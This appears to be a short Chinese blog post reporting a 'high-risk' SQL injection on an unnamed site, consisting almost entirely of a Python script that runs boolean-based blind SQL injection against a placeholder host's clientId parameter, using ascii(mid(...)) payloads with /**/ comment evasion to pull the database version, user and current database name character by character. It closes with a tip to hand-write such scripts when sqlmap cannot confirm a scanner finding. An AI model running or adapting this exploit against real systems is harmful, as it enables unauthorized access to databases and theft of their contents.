【高危】XX某站SQL注入
时间:2021-07-01 10:21:17
帮助过:20人阅读
#! /usr/bin/env python3
2 # Date : 1/5 16:04
3 # Comment: no comment
4
5
6 import requests
7
8 raw_url =
xxx
9 burp0_cookies =
{xxx}
10 burp0_headers =
{xxx}
11
12
13 def get_version():
14 version =
‘‘
15 for i
in range(1, 20
):
16 for j
in range(32, 127
):
17 burp0_url =
"http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(version()," + str(i) +
",1))=" +
str(j)
18 print burp0_url
19 try:
20 res = requests.get(burp0_url, headers=burp0_headers, cookies=
burp0_cookies)
21 except Exception as e:
22 continue
23 if "true" in res.text:
24 version +=
chr(j)
25 break
26 print(
‘version:‘, version)
27
28
29 def get_user():
30 user =
‘‘
31 for i
in range(1, 20
):
32 for j
in range(32, 127
):
33 burp0_url =
"http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(user()," + str(i) +
",1))=" +
str(j)
34 print burp0_url
35 try:
36 res = requests.get(burp0_url, headers=burp0_headers, cookies=
burp0_cookies)
37 except Exception as e:
38 continue
39 if "true" in res.text:
40 user +=
chr(j)
41 break
42 print(
‘user:‘, user)
43
44
45 def get_db():
46 current_db =
‘‘
47 for i
in range(1, 20
):
48 for j
in range(32, 127
):
49 burp0_url =
"http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(database()," + str(i) +
",1))=" +
str(j)
50 print burp0_url
51 try:
52 res = requests.get(burp0_url, headers=burp0_headers, cookies=
burp0_cookies)
53 except Exception as e:
54 continue
55 if "true" in res.text:
56 current_db +=
chr(j)
57 break
58 print(
‘current_db:‘, current_db)
59
60 get_version()
61 get_db()
62 get_user()
sqlmap跑不出,就是扫描器先跑出来,但是sqlmap验证不了,却又确实存在的,可以写脚本验证,这是一种思路吧。
【高危】XX某站SQL注入
标签:布尔 requests asc chrome user win aaa apple cli
